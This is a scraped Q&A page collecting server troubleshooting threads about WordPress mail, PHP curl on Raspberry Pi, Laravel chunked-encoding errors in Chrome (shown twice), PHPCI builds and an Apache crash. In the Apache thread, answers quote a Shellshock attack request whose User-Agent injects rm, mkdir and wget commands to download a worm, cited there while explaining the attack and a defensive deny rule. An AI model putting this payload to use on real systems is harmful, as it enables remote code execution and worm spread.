I can't send user mail on WordPress - php

I almost give up what is wrong.
I've setup web server by using nginx.
But I can't send user mail on WordPress.
When I create user or reset password, WordPress must stop.
The environment is bellow.
Ubuntu0.16.04.1
Nginx 1.12.1
PHP 7.0.1
FPM/FastCGI
postfix 3.1.0
(I can send mail by 'mail' command.)
WordPress 4.4.2
Nginx Erro log is bellow----
PHP message: PHP Fatal error: require_once(): Failed opening required
'/var/www/html/cms/wp-includes/class-phpmailer.php'
(include_path='.:/usr/share/php') in
/var/www/html/cms/wp-includes/pluggable.php on line 275" while reading
response header from upstream, client: {global_ip}, server: {domain},
request: "POST /cms/wp-admin/user-edit.php HTTP/1.1", upstream:
"fastcgi://unix:/var/run/php/php7.0-fpm.sock:", host: "{host_name}",
referrer:
"/cms/wp-admin/user-edit.php?user_id=2&wp_http_referer=%2Fcms%2Fwp-admin%2Fusers.php"
Any help or hint?

Thanks every one.It was solved.
When I install WordPress ,I've used "sudo apt get wordpress",and copy them to html root.
I don't know why ,(I might not use 'cp' command with sudo )
'class-phpmailer.php' and 'class-phpmailer.php' were not moved properly.
So that when the system use wp_mail() function , the WordPress was stop.
That's all.Thanks a lot!

Related

How to get PHP 8.1 to recognize curl_init?

I know this may seem similar to many questions already out there, but I've read dozens and I am still experiencing the same issue. My code works fine on my local machine, and my Raspberry Pi was configured by the exact same setup script, but it doesn't work on the Pi.
My OS is Raspbian 10 (Buster) with kernel version 5.10.103-v7l+. I am running PHP 8.1, along with the other packages in the following command: sudo apt install -y php8.1-common php8.1-cli php8.1-fpm php8.1-xml php8.1-curl
php -m lists curl and php -i and phpinfo() show that cURL is installed and enabled:
cURL support => enabled
cURL Information => 7.64.0
I know cURL is installed and enabled, so how do I get my PHP to recognize and use the package? It works perfectly on my local Linux box but on the Pi it just doesn't. I have restarted my server and my entire machine and neither made a difference. I have ran sudo apt update && sudo apt upgrade and everything is at the most recent version.
The 'problematic' snippet of code on my server is the following:
require "vendor/autoload.php";
use Symfony\Component\Panther\Client;
$options = [
"--headless",
"--window-size=1200,1100",
"--no-sandbox",
"--disable-gpu",
"--disable-dev-shm-usage",
];
$query = urlencode($_GET["q"]);
$url ="/search?hl=en&tbo=d&site=&source=hp&q=".$query;
$client = Client::createChromeClient("/usr/lib/chromium-browser/chromedriver", $options, [], "http://www.google.com");
$client->request("GET", $url);
My full error log is:
*168 FastCGI sent in stderr: "PHP message: PHP Fatal error: Uncaught Error: Call to undefined function Facebook\WebDriver\Remote\curl_init() in /var/lib/jenkins/workspace/url-here.com/vendor/php-webdriver/webdriver/lib/Remote/HttpCommandExecutor.php:190
Stack trace:
#0 /var/lib/jenkins/workspace/url-here.com/vendor/php-webdriver/webdriver/lib/Remote/RemoteWebDriver.php(100): Facebook\WebDriver\Remote\HttpCommandExecutor->__construct()
#1 /var/lib/jenkins/workspace/url-here.com/vendor/symfony/panther/src/ProcessManager/ChromeManager.php(75): Facebook\WebDriver\Remote\RemoteWebDriver::create()
#2 /var/lib/jenkins/workspace/url-here.com/vendor/symfony/panther/src/Client.php(117): Symfony\Component\Panther\ProcessManager\ChromeManager->start()
#3 /var/lib/jenkins/workspace/url-here.com/vendor/symfony/panther/src/Client.php(521): Symfony\Component\Panther\Client->start()
#4 /var/lib/jenkins/workspace/url-here.com/vendor/symfony/panther/src/Client.php(273): Symfony\Component\Panther\Client->get()
#5 /var/lib/jenkins/workspace" while reading response header from upstream, client: 96.244.127.121, server: url-here.com, request: "GET /googleSearch.php?q=test HTTP/1.1", upstream: "fastcgi://unix:/run/php/php8.0-fpm.sock:", host: "url-here.com", referrer: "https://url-here.com/apps/browser.html"
Any and all help would be appreciated, I've been struggling with this one for a while. I would just avoid using curl_init() if I could, but unfortunately as you can see the function is called in a library that my project depends on.
This line from the error log indicates what the problem most likely is:
#5 /var/lib/jenkins/workspace" while reading response header from upstream, client: 96.244.127.121, server: url-here.com, request: "GET /googleSearch.php?q=test HTTP/1.1", upstream: "fastcgi://unix:/run/php/php8.0-fpm.sock:", host: "url-here.com", referrer: "https://url-here.com/apps/browser.html"
You've got PHP 8.0 here, but you've installed Curl for PHP 8.1. You need to check your FPM or server configuration.
I think you're using Nginx. If that's correct then this article might be helpful. Specifically you'll want to look in:
/etc/nginx/sites-available to check which socket is used
/etc/php/VERSION/fpm/pool.d to check what sockets are available

Sometimes error appears net::ERR_INCOMPLETE_CHUNKED_ENCODING [duplicate]

This only happens on Google Chrome and Chromium with a fresh install of Laravel.
The page shows blank and in the console it says:
(failed) net::ERR_INCOMPLETE_CHUNKED_ENCODING
Instead of the default hello view that which says “You have arrived.”
My server is Debian Wheezy with ISPConfig, Apache 2.2 and PHP 5.4
Does anybody knows how can I fix this?
Had the same problem on a Ubuntu 14.04 Vagrant box running nginx. The site is a Laravel 5 that one day surprisingly started throwing those errors.
After reading this comment:
https://github.com/barryvdh/laravel-debugbar/issues/262#issuecomment-74385850
I've checked my /var/log/nginx/vagrant.com-error.log.1 and saw:
[crit] 1020#0: *774 open() "/var/lib/nginx/fastcgi/3/03/0000000033" failed (13: Permission denied) while reading upstream, client: 192.168.56.1, server: 192.168.56.102.xip.io, request: "GET /_debugbar/assets/javascript?1423122680 HTTP/1.1", upstream: "fastcgi://127.0.0.1:9000", host: "my-host", referrer: "http://url/that/fails"
Double-checked my Vagrant box nginx lib directory permissions ll /var/lib/
drwxr-xr-x 7 root root 4096 feb 9 11:28 nginx/
... where internally was using www-data user: ll /var/lib/nginx/
drwx------ 12 www-data root 4096 may 5 13:32 fastcgi/
So I ran:
chown -R www-data:www-data /var/lib/nginx
And the error in Chrome disappeared.
Just posting here to notice the solution, even all the credits should go to the linked original comment.
I had the exact same problem that you have. I found a work-around over here on this forum thread:
http://laravel.io/forum/02-08-2014-another-problem-only-with-chrome
The code used by the person who provided a the workaround: http://laravel.io/bin/eyyDj#4,7
The gist of it is to just up and tell Chrome how much data to expect for every request, so it doesn't have to chunk the data.
I'm seeing reports that upgrading to PHP 5.5 also fixes this problem, but not all of us can have that kind of control over our servers.
Edit: It looks as if blindly applying this work-around causes errors on redirects. This is the code that I'm now using:
App::after(function($request, $response) {
// Fixes a strange issue with Chrome. Should theoretically be removeable
// after upgrading PHP to 5.5 from 5.4
if ($response instanceof Illuminate\Http\Response) {
$response->header('Content-Length', strlen($response->getOriginalContent()));
}
});
Note that JSON responses are a separate type and may still have the chunking issue, so this solution may need to evolve somewhat to accommodate that.

Build in PHPCI takes forever

I'm setting up Continues Integration and I'm wondering if everything should take so damn long.
My build is running for over a day in the mean time and still it's not finished.
It is a normal Laravel app with around 20 controllers, so a little time is granted, but over a day?
My config is fairly simple in my opinion:
build_settings:
ignore:
- "vendor"
setup:
composer:
action: "install"
test:
php_mess_detector:
allow_failures: true
php_code_sniffer:
standard: "PSR2"
php_cpd:
allow_failures: true
php_docblock_checker:
allowed_warnings: 10
skip_classes: true
php_loc:
directory: "src"
No errors, only the (by now) pesky status "Pending"
When I check the logs I get this error:
2016/01/28 08:01:32 [error] 6702#0: *4 FastCGI sent in stderr: "PHP message: PHP Fatal error: Class 'PHPCI\Controller' not found in /var/www/vendor/block8/b8framework/b8/Application.php on line 93" while reading response header from upstream, client: someipaddress, server: green.somedomain.com, request: "GET /assets/js/plugins/datepicker/locales/bootstrap-datepicker.en.js HTTP/1.1", upstream: "fastcgi://unix:/var/run/php5-fpm.sock:", host: "green.somedomain.com", referrer: "http://green.somedomain.com/build/view/5"
I did composer update / install and I also added the following rule to the nginx configuration:
fastcgi_param SCRIPT_NAME index.php;
My question is, is this normal? Is my config good? Am I forgetting something?
You've not set up the build runner when you set up PHPCI. The web interface merely creates the build and displays the results, you need to run the command line tool to run the builds.
There are three ways to set this up:
(New in 1.7 beta) PHPCI Worker w/ beanstalkd.
Install beanstalkd
Use supervisord (or similar) to run /path/to/phpci/console phpci:worker
(Recommended for 1.6 and below) PHPCI Daemon: https://www.phptesting.org/wiki/Run-Builds-Using-a-Daemon
(Fallback option) Cron: https://www.phptesting.org/wiki/Run-Builds-Using-Cron

Apache http server has stopped working

Hi Friends,
I am using Ampps server with php 5.3.29 in windows server datacenter.
unfortunately i am getting the following prompt in windows server and my site down.
Prompt title:
Microsoft windows
Prompt Message:
Apache http server has stopped working.
A problem caused the program to stop working correctly. windows will close the program and notify you if a solution is available.
Trace:
When i tracing error and access logs, i found the following logs as the cause.
In Apache access log:
202.175.83.36 - - [10/Dec/2014:05:58:50 -0500] "GET /cgi-bin/authLogin.cgi HTTP/1.1" 404 1335
217.248.177.30 - - [10/Dec/2014:06:11:24 -0500] "GET /cgi-bin/authLogin.cgi HTTP/1.1" 404 1335
209.153.244.6 - - [10/Dec/2014:07:09:17 -0500] "GET /cgi-bin/authLogin.cgi HTTP/1.1" 404 1335
81.214.132.245 - - [10/Dec/2014:07:25:04 -0500] "GET /cgi-bin/authLogin.cgi HTTP/1.1" 404 1335
In Apache error log:
[Wed Dec 10 07:25:04.401073 2014] [cgi:error] [pid 2908:tid 1168] [client 81.214.132.245:36246] script not found or unable to stat: D:/Program Files/Ampps/www/cgi-bin/authLogin.cgi
Please help me.
There is a Web bot trying to get authority so it can wget and execute something like S0.py, which I imagine is a worm so the download server is compromised.
Id like a copy of S0.sh if you happen to get one give it to exploit-db or something like it.
The clever command is:
Get /cgi-bin/authLogin.cgi HTTP/1.1.Host: 127.0.0.1.User-Agent:() { :; }; /bin/rm -rf /tmp/S0.sh && /bin/mkdir -p /share/HDB_DATA/.../php && /usr/bin/wget
The file is executed following download.
I suppose there's something about HDB_DATA, which I don't even have.
"Information is Paramount!"
If you try to open this file, what happens?
D:/Program Files/Ampps/www/cgi-bin/authLogin.cgi
The message indicates that the file does not exist, as indicated by the 404 error and the message "script not found".
Finally i denied those client to access the cgi-bin directory.
in cgi-bin directory i created a .htaccess file
I added following line in .htaccess
Deny From all.
I don't think authLogin.cgi really matters other than it might allow someone to execute. The problem is that the user tries to or successfully removes /tmp/S0.sh and make a directory php in the share folder and then execute wget.
/bin/rm -rf /tmp/S0.sh && /bin/mkdir -p /share/HDB_DATA/.../php && /usr/bin/wget
Here is what came up after all that time of wondering:
http://jrnerqbbzrq.blogspot.com/2014/12/a-little-shellshock-fun.html
"S0.sh consists of two main parts ... the first part does the initial setup and downloads additional programs, and then the second part installs the worm and executes some additional commands."
So it was a real treat catching this action and initially no one knew to call it Shellshock. There is a copy of S0.sh there and you can see it's a worm, which I presumed was the case.
From what I read the worm is just browsing the IP space looking for anyone listening to port 8080.

ERR_INCOMPLETE_CHUNKED_ENCODING on a fresh Laravel install

This only happens on Google Chrome and Chromium with a fresh install of Laravel.
The page shows blank and in the console it says:
(failed) net::ERR_INCOMPLETE_CHUNKED_ENCODING
Instead of the default hello view that which says “You have arrived.”
My server is Debian Wheezy with ISPConfig, Apache 2.2 and PHP 5.4
Does anybody knows how can I fix this?
Had the same problem on a Ubuntu 14.04 Vagrant box running nginx. The site is a Laravel 5 that one day surprisingly started throwing those errors.
After reading this comment:
https://github.com/barryvdh/laravel-debugbar/issues/262#issuecomment-74385850
I've checked my /var/log/nginx/vagrant.com-error.log.1 and saw:
[crit] 1020#0: *774 open() "/var/lib/nginx/fastcgi/3/03/0000000033" failed (13: Permission denied) while reading upstream, client: 192.168.56.1, server: 192.168.56.102.xip.io, request: "GET /_debugbar/assets/javascript?1423122680 HTTP/1.1", upstream: "fastcgi://127.0.0.1:9000", host: "my-host", referrer: "http://url/that/fails"
Double-checked my Vagrant box nginx lib directory permissions ll /var/lib/
drwxr-xr-x 7 root root 4096 feb 9 11:28 nginx/
... where internally was using www-data user: ll /var/lib/nginx/
drwx------ 12 www-data root 4096 may 5 13:32 fastcgi/
So I ran:
chown -R www-data:www-data /var/lib/nginx
And the error in Chrome disappeared.
Just posting here to notice the solution, even all the credits should go to the linked original comment.
I had the exact same problem that you have. I found a work-around over here on this forum thread:
http://laravel.io/forum/02-08-2014-another-problem-only-with-chrome
The code used by the person who provided a the workaround: http://laravel.io/bin/eyyDj#4,7
The gist of it is to just up and tell Chrome how much data to expect for every request, so it doesn't have to chunk the data.
I'm seeing reports that upgrading to PHP 5.5 also fixes this problem, but not all of us can have that kind of control over our servers.
Edit: It looks as if blindly applying this work-around causes errors on redirects. This is the code that I'm now using:
App::after(function($request, $response) {
// Fixes a strange issue with Chrome. Should theoretically be removeable
// after upgrading PHP to 5.5 from 5.4
if ($response instanceof Illuminate\Http\Response) {
$response->header('Content-Length', strlen($response->getOriginalContent()));
}
});
Note that JSON responses are a separate type and may still have the chunking issue, so this solution may need to evolve somewhat to accommodate that.

Categories